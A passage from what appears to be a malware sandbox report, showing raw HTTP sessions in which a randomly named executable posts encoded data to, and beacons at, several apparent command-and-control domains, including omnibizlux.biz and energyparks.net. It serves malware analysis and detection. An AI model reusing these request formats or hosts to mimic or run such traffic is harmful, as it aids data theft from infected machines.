                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 6a 61 48 59 6e 78 52 39 32 37 4b 4e 66 4f 37 65 52 49 57 63 44 62 6f 49 47 36 73 53 66 51 58 46 38 78 57 33 32 64 65 6e 4f 48 47 78 73 71 78 51 35 57 6b 51 6e 38 69 32 70 67 6b 74 38 6b 31 5a 5a 43 63 6c 34 4e 70 61 38 62 6f 38 53 74 76 55 6a 7a 36 70 4b 6e 6b 67 33 64 45 4b 6c 6c 7a 67 61 72 44 4a 62 48 43 69 6f 45 56 78 69 6a 6a 67 47 57 70 2f 5a 71 46 71 6c 4e 6c 59 75 56 6f 64 76 39 36 6e 6d 2b 74 35 31 6f 63 31 76 68 6a 78 48 36 4d 59 44 52 66 52 6a 59 39 41 50 32 56 43 65 76 2b 6b 56 68 32 6c 52 54 2b 63 78 48 74 58 6f 77 36 49 61 6b 5a 70 75 53 58 48 33 46 4a 76 4a 7a 62 6e 64 63 73 45 67 52 74 56 59 44 48 62 57 77 68 57 66 38 79 73 2f 6e 62 2f
                                                                        Data Ascii: J8LHgDJp=jaHYnxR927KNfO7eRIWcDboIG6sSfQXF8xW32denOHGxsqxQ5WkQn8i2pgkt8k1ZZCcl4Npa8bo8StvUjz6pKnkg3dEKllzgarDJbHCioEVxijjgGWp/ZqFqlNlYuVodv96nm+t51oc1vhjxH6MYDRfRjY9AP2VCev+kVh2lRT+cxHtXow6IakZpuSXH3FJvJzbndcsEgRtVYDHbWwhWf8ys/nb/
                                                                        Nov 9, 2024 05:36:37.394328117 CET369INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:37 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        15192.168.2.549996167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:39.279053926 CET1786OUTPOST /ylto/ HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.omnibizlux.biz
                                                                        Referer: http://www.omnibizlux.biz/ylto/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 6a 61 48 59 6e 78 52 39 32 37 4b 4e 66 4f 37 65 52 49 57 63 44 62 6f 49 47 36 73 53 66 51 58 46 38 78 57 33 32 64 65 6e 4f 48 4f 78 76 5a 35 51 72 6c 4d 51 39 38 69 32 71 67 6b 6f 38 6b 31 45 5a 43 45 68 34 4e 74 6b 38 59 51 38 54 4f 33 55 68 47 4f 70 46 6e 6b 67 31 64 45 50 34 31 7a 31 61 6f 72 7a 62 48 53 69 6f 45 56 78 69 6b 62 67 49 54 64 2f 62 71 46 74 69 4e 6c 63 34 6c 6f 68 76 39 53 64 6d 2b 6f 62 31 5a 38 31 76 42 54 78 47 49 6b 59 42 78 66 66 67 59 39 69 50 32 5a 6e 65 76 69 65 56 68 71 44 52 54 32 63 79 69 30 72 71 45 79 32 4f 53 4e 65 74 6c 44 35 76 44 46 31 41 54 66 39 65 4e 59 44 68 67 70 75 64 55 2f 6b 41 54 41 49 4e 62 6d 50 2b 79 43 4a 54 69 7a 62 78 2f 54 48 42 65 35 73 71 46 39 52 61 31 68 5a 74 4c 6b 79 30 2f 7a 6f 34 7a 78 4a 73 6b 49 36 35 66 73 30 7a 63 78 37 4f 63 30 6f 34 4c 48 67 4b 67 55 48 67 38 47 62 44 72 45 56 75 67 33 4f 46 47 47 36 61 41 6a 7a 38 65 43 42 7a 74 42 30 76 74 79 69 4a 78 42 30 68 6e 73 71 41 69 65 50 41 74 62 79 64 2f 5a 58 77 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=jaHYnxR927KNfO7eRIWcDboIG6sSfQXF8xW32denOHOxvZ5QrlMQ98i2qgko8k1EZCEh4Ntk8YQ8TO3UhGOpFnkg1dEP41z1aorzbHSioEVxikbgITd/bqFtiNlc4lohv9Sdm+ob1Z81vBTxGIkYBxffgY9iP2ZnevieVhqDRT2cyi0rqEy2OSNetlD5vDF1ATf9eNYDhgpudU/kATAINbmP+yCJTizbx/THBe5sqF9Ra1hZtLky0/zo4zxJskI65fs0zcx7Oc0o4LHgKgUHg8GbDrEVug3OFGG6aAjz8eCBztB0vtyiJxB0hnsqAiePAtbyd/ZXwyFQLpddNg+UjLH3R8bx+bQeddC5sIGs9f0bQjVOHF2X6O7jrDrr4PhiufPjl6tyFL/+nzv75WB8u/CsizXcfuNfprQkWG8cgq67vmqIBvLaoPQI9oBO/ceXkJi0drRx4tC1AREM194BJg29PKYSu1QdYshB+pgvb93P3Ku3+lls0KB8OsnpJe3fJD7hyrJm1gylH6snoihLmaUS0ktlyHCiXX92FYie9kF+UUvmr9hzvYDVgybPHRYD5XLxmlCeAsqNtR6luGQQ6Gmd7AQ2vyPyf7ovV5wwyAbIrDgLkoIBWqdGrq1xrMhhNZkgqKo4rxZe3CdgCEjuKOuxZd9lvCZlcrcbMH7GRipByULuym7ydSv/5NJxl9753+HqLQnFkXufCKTQstTF+wSJz9P3Jzy3GoCyjoUMit5I+EeWaPktpxGmjNHFw3fExil9wLJs4mrNlJbRXZlF2G74d3hxGhoKcqED2bVGOnsZtTT4Uze9j8SOqlcN2rW0hTSHjJ9nb/vTu7+R7aIHHd1mw8S5Zodp95RlT2Wi/1HTeCnhML2h0b4E2K9qxtu6TqIcE0wKYbK3eXD9OtlUC0XO/wb3tM1sI015+QbOiOwj28l5HORg6X/828UjvJobcQCeijttBZZUFUldXg/9VgCBBgOlA1W2hWja0oXFGcW [TRUNCATED]
                                                                        Nov 9, 2024 05:36:39.948308945 CET369INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:39 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.549997167.172.133.32803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:41.813235044 CET490OUTGET /ylto/?J8LHgDJp=uYv4kBsD3a2LIu39RI2EN5QaJ/QGWlTF0j2ZxsKcJFSdquhIvwsPj5Km9wQw9lg3VAI27qB+9KUHV5rrvR7hLmJ3jtEB7TDQFLuda37LuGp+gEzOJmBCc5BPpe4hsE5s8g==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:42.494493008 CET705INHTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:42 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 555
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.5499983.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:47.595062017 CET752OUTPOST /fdhm/ HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.energyparks.net
                                                                        Referer: http://www.energyparks.net/fdhm/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 74 36 53 31 6b 45 53 46 4a 39 49 45 51 78 73 4b 42 6a 4a 79 37 6d 69 4f 56 52 48 31 54 31 73 50 55 38 78 34 53 77 51 6b 4c 65 35 71 58 39 57 6c 4b 50 32 6e 4b 69 39 76 31 6b 4e 36 61 50 6f 6c 75 78 33 41 4f 66 4c 49 65 4d 6a 74 36 65 63 4a 52 46 56 56 70 31 4f 6b 50 38 6d 68 59 65 5a 64 52 57 42 50 58 63 6b 44 38 6e 61 67 48 6a 65 54 6b 38 75 76 76 6c 57 35 4b 32 68 6f 65 75 4e 65 61 2f 39 43 59 36 4d 4d 4d 68 77 4a 5a 6d 35 43 64 73 76 54 4a 52 2f 76 6a 61 33 71 67 53 35 39 70 44 47 2f 74 79 69 52 76 51 31 5a 6f 62 56 64 37 66 33 67 45 59 43 4e 49 4f 66 59 49 4a 4f 53 65 75 52 43 74 34 3d
                                                                        Data Ascii: J8LHgDJp=Gt6S1kESFJ9IEQxsKBjJy7miOVRH1T1sPU8x4SwQkLe5qX9WlKP2nKi9v1kN6aPolux3AOfLIeMjt6ecJRFVVp1OkP8mhYeZdRWBPXckD8nagHjeTk8uvvlW5K2hoeuNea/9CY6MMMhwJZm5CdsvTJR/vja3qgS59pDG/tyiRvQ1ZobVd7f3gEYCNIOfYIJOSeuRCt4=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.5499993.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:50.129931927 CET772OUTPOST /fdhm/ HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.energyparks.net
                                                                        Referer: http://www.energyparks.net/fdhm/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 74 36 53 31 6b 45 53 46 4a 39 49 56 41 42 73 49 6e 72 4a 30 62 6d 68 45 31 52 48 2b 7a 31 67 50 56 41 78 34 54 6b 41 6b 35 36 35 72 31 31 57 6b 4c 50 32 6b 4b 69 39 37 6c 6b 4d 6e 71 50 32 6c 75 4d 41 41 4c 6e 4c 49 65 77 6a 74 37 4f 63 4a 43 74 4b 48 4a 31 51 74 76 38 34 6c 59 65 5a 64 52 57 42 50 58 5a 35 44 38 66 61 67 57 54 65 63 6c 38 70 7a 66 6c 56 75 36 32 68 73 65 75 4a 65 61 2f 44 43 5a 6e 6e 4d 4f 5a 77 4a 59 57 35 44 4f 30 75 45 35 52 35 68 44 62 41 74 77 6e 30 69 6f 69 47 33 72 6a 33 43 63 56 55 52 2b 71 2f 48 5a 58 66 7a 6b 30 36 64 62 47 6f 4a 34 6f 6e 49 39 2b 68 63 36 75 4d 2f 32 62 4c 6e 48 67 79 48 75 77 4c 57 48 65 6d 58 44 4a 55
                                                                        Data Ascii: J8LHgDJp=Gt6S1kESFJ9IVABsInrJ0bmhE1RH+z1gPVAx4TkAk565r11WkLP2kKi97lkMnqP2luMAALnLIewjt7OcJCtKHJ1Qtv84lYeZdRWBPXZ5D8fagWTecl8pzflVu62hseuJea/DCZnnMOZwJYW5DO0uE5R5hDbAtwn0ioiG3rj3CcVUR+q/HZXfzk06dbGoJ4onI9+hc6uM/2bLnHgyHuwLWHemXDJU


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.5500003.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:52.679604053 CET1789OUTPOST /fdhm/ HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.energyparks.net
                                                                        Referer: http://www.energyparks.net/fdhm/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 47 74 36 53 31 6b 45 53 46 4a 39 49 56 41 42 73 49 6e 72 4a 30 62 6d 68 45 31 52 48 2b 7a 31 67 50 56 41 78 34 54 6b 41 6b 35 79 35 72 48 4e 57 6c 6f 6e 32 6c 4b 69 39 6e 56 6b 52 6e 71 4f 7a 6c 75 6b 45 41 4c 69 70 49 59 38 6a 75 5a 57 63 59 44 74 4b 4e 4a 31 51 76 76 38 35 68 59 65 41 64 52 47 46 50 58 4a 35 44 38 66 61 67 55 62 65 59 30 38 70 67 50 6c 57 35 4b 32 39 6f 65 75 78 65 63 57 34 43 5a 69 63 4e 2f 35 77 4a 37 2b 35 41 39 51 75 47 5a 52 37 30 44 62 59 74 77 36 30 69 6f 2f 2f 33 72 2b 2f 43 63 64 55 48 61 36 70 58 71 72 41 69 6e 6f 67 56 61 4f 75 49 39 41 59 4e 73 61 4e 55 34 50 76 79 6d 50 31 6c 51 42 71 42 4b 68 78 43 32 4c 31 51 30 6f 66 74 57 50 55 73 33 6c 50 61 31 41 52 35 51 76 48 47 6a 64 6c 33 32 4f 4b 43 5a 30 51 4c 6d 65 74 4c 6d 76 6f 6b 4e 6c 6e 4e 77 43 70 74 2b 6b 4d 61 54 41 73 47 70 49 6a 78 75 6a 2f 54 6a 66 4a 70 75 33 74 6b 38 4c 31 77 37 38 58 37 65 45 6f 42 32 54 2b 71 35 49 73 33 4c 44 50 55 58 46 38 71 2f 7a 73 51 41 48 30 4b 45 73 4e 69 [TRUNCATED]
                                                                        Data Ascii: J8LHgDJp=Gt6S1kESFJ9IVABsInrJ0bmhE1RH+z1gPVAx4TkAk5y5rHNWlon2lKi9nVkRnqOzlukEALipIY8juZWcYDtKNJ1Qvv85hYeAdRGFPXJ5D8fagUbeY08pgPlW5K29oeuxecW4CZicN/5wJ7+5A9QuGZR70DbYtw60io//3r+/CcdUHa6pXqrAinogVaOuI9AYNsaNU4PvymP1lQBqBKhxC2L1Q0oftWPUs3lPa1AR5QvHGjdl32OKCZ0QLmetLmvokNlnNwCpt+kMaTAsGpIjxuj/TjfJpu3tk8L1w78X7eEoB2T+q5Is3LDPUXF8q/zsQAH0KEsNiUSfpBJHWQ1dz1QD20xWtonRKQuFyNHmcOCrqeOpy0zrlJU/Et+5MHKtc5fQ99UvrHknyYQ0xerLKKtaEHen83hnPR0PDRxiY6C4BkpfBPLWFduj/oHnDfqhjq5TPIUz62hn2Qf5s9AnH5zA0kDiF1uYWG+zsWXzz5I13vJc0tz+DKCvF//M0sfzNQn/+82xY06n51wRm4bIdg4WuXznoRKSq4OfHTHU8J/TQjeJP7IrMK7mpkKhEL+0q4Rj8vzOXCXiWyY7yc47QzLHpc77NyyBK8hI4B+VI3zbZvWcHvnnY9uLEoBfNEMmHjapExnOPZzFgv8aWf125HwuIKlxKf58jQu5t9ShcqT8p4OMf8/QMMuic3qOdWLw5it2WvmrUc43kIFBsyFLiEA6JYKk5hN5OlFSov+uoRi/EcBti7rXumelvCWQMgfvho47hmMsmJ9jYLsnUJrnOnpqIlS8Sm7CPRRRKfpsGLtaDILinjSuf1BK6B/jq6a5ffiAUFnshmAb1d3YpjhQrw0zMK7HoE2Bl7bfLiaDJ9aLC4WaIGCyN07SUQLQmRTTmO86ROlO3/aR68cSg1/NQ3fHJOIhYNQr0wYhmF15TCtgGlwLb38KPPIQl2ylAhMsssV/k2EJm37Sq847y/mcuDxY/+sJIhUdDLoDz1AGyKM [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.5500013.33.130.190803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:36:55.226936102 CET491OUTGET /fdhm/?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:55.861824036 CET414INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:36:55 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4a 38 4c 48 67 44 4a 70 3d 4c 76 53 79 32 52 67 57 44 70 34 58 47 67 39 55 55 77 53 4c 39 35 6e 77 4d 54 70 51 31 45 35 58 4a 6e 67 67 35 43 73 4e 71 71 32 32 6b 69 6b 54 73 74 58 2f 6d 50 71 2f 37 45 4d 71 76 64 66 6a 67 66 77 55 57 73 44 30 55 6f 52 65 32 63 79 38 58 7a 56 64 45 74 74 6b 37 4d 30 6b 72 4d 32 4e 57 79 4c 54 4d 45 6b 72 45 4c 72 2b 33 56 50 70 63 33 45 30 71 38 56 70 71 49 2b 66 6e 59 72 42 63 51 3d 3d 26 61 46 3d 4a 4c 70 34 6f 30 51 78 32 46 2d 70 34 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.550002162.241.63.77803660C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 9, 2024 05:37:01.231091976 CET755OUTPOST /e3rr/ HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.estrela-b.online
                                                                        Referer: http://www.estrela-b.online/e3rr/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Raw: 4a 38 4c 48 67 44 4a 70 3d 46 69 68 64 66 30 66 6f 77 64 49 74 71 58 6f 38 72 57 4c 4c 49 6f 75 31 66 71 6d 63 76 4c 54 32 2b 49 57 4c 48 31 63 36 36 37 47 69 74 64 4f 78 63 34 5a 30 53 41 53 37 74 72 44 78 31 49 43 48 4c 43 45 76 30 66 6c 4e 37 6d 37 66 65 6e 4d 67 61 4f 56 44 79 56 6b 55 38 32 5a 6c 76 4d 48 76 49 6a 35 6c 79 66 6b 64 6f 31 75 56 53 79 47 77 30 35 4a 6f 2f 4e 48 61 77 7a 4f 74 41 62 4a 67 53 61 46 44 65 74 78 67 79 58 71 45 31 41 33 56 63 6f 66 30 77 46 35 30 5a 41 43 43 38 72 52 56 51 61 7a 56 4e 75 52 49 67 75 79 4b 74 51 57 63 7a 69 63 49 70 74 4d 4a 48 6c 6f 75 4b 45 6c 35 62 59 55 79 75 41 6b 3d
                                                                        Data Ascii: J8LHgDJp=Fihdf0fowdItqXo8rWLLIou1fqmcvLT2+IWLH1c667GitdOxc4Z0SAS7trDx1ICHLCEv0flN7m7fenMgaOVDyVkU82ZlvMHvIj5lyfkdo1uVSyGw05Jo/NHawzOtAbJgSaFDetxgyXqE1A3Vcof0wF50ZACC8rRVQazVNuRIguyKtQWczicIptMJHlouKEl5bYUyuAk=
                                                                        Nov 9, 2024 05:37:01.953357935 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:01 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        Content-Length: 1165
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 8f 1b 35 14 7d de fc 0a 77 10 7d 40 78 9c 5d 5a 1e b2 93 54 50 10 45 a2 50 51 a4 8a a7 ca 33 be 99 71 d7 e3 6b 6c 4f 26 29 ea 7f e7 7a be 9a dd 6d 51 29 51 a2 99 dc cf 73 cf 39 c5 83 1f 7e 7b fa c7 9f 2f 7e 64 4d 6c cd 6e 55 a4 07 33 d2 d6 db cc 45 fe fd ef d9 6e 75 51 34 20 15 3d 2f 8a 16 a2 64 56 b6 b0 cd 0e 1a 7a 87 3e 66 ac 42 1b c1 c6 6d d6 6b 15 9b ad 82 83 ae 80 0f 7f b2 bb 5d 1e 4b 8c e1 ac c7 a2 b6 0a 8e 5f 33 8b 7b 34 06 fb 8c 89 a1 29 ea 68 60 f7 1c 3a 16 74 04 f6 b0 55 32 34 d7 ec 29 b6 da d6 ec 25 a2 2d c4 58 93 aa 43 e5 b5 8b 2c f8 6a 9b 35 31 ba 8d 10 10 a2 07 23 79 99 a3 35 da 82 e8 1d d7 b6 32 9d 82 20 de d0 f7 af 0e fc 69 7a e4 6f 42 b6 2b c4 38 66 9c 18 4f 06 58 3c 39 42 1d e1 18 45 15 a8 e4 2b f6 f7 8a d1 a7 c4 23 0f fa 2d 41 d9 d0 bb 57 e0 39 85 ae 87 1c 6f f1 2d ff d7 82 1e ca 1b 1d 3f 5a f3 6e b5 2a 51 9d e6 55 b2 ba a9 3d 76 56 f1 0a 0d fa 0d eb 1b 62 64 1c 35 45 4a 43 45 63 04 0f e0 f7 c4 23 3f 6e 58 a3 